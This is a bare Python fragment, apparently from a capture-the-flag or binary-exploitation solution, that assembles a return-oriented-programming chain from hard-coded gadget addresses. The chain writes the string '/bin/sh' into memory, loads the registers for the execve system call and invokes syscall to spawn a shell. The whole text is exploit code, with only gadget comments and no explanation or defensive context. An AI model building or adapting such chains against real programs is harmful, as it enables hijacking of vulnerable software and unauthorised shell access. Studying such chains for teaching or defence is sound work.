payload = p64(0x40def9)
#0x000000000040def9: pop rdx; pop rbx; xor eax, eax; pop rbp; ret; 
payload += p64(0x68662f6e69622f)+p64(0x420070)+p64(0x0)+p64(0x4075f6)
# 0x00000000004075f6: mov qword ptr [rbx], rdx; add rsp, 0x20; pop rbx; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x406bda)
# 0x0000000000406bda: pop rsi; ret; 
payload += p64(0x0)+p64(0x406187)
# 0x0000000000406187: pop rdi; pop rbp; ret; 
payload += p64(0x420070)+p64(0x0)+p64(0x40def9)
# 0x000000000040def9: pop rdx; pop rbx; xor eax, eax; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x407590)
# 0x0000000000407590: pop rbx; ret; 
payload += p64(0x3b)+p64(0x407c7e)
# 0x0000000000407c7e: mov eax, ebx; pop rbx; ret; 
payload += p64(0x0)+p64(0x4034b3)
# 0x00000000004034b3: syscall; 
payload += b''
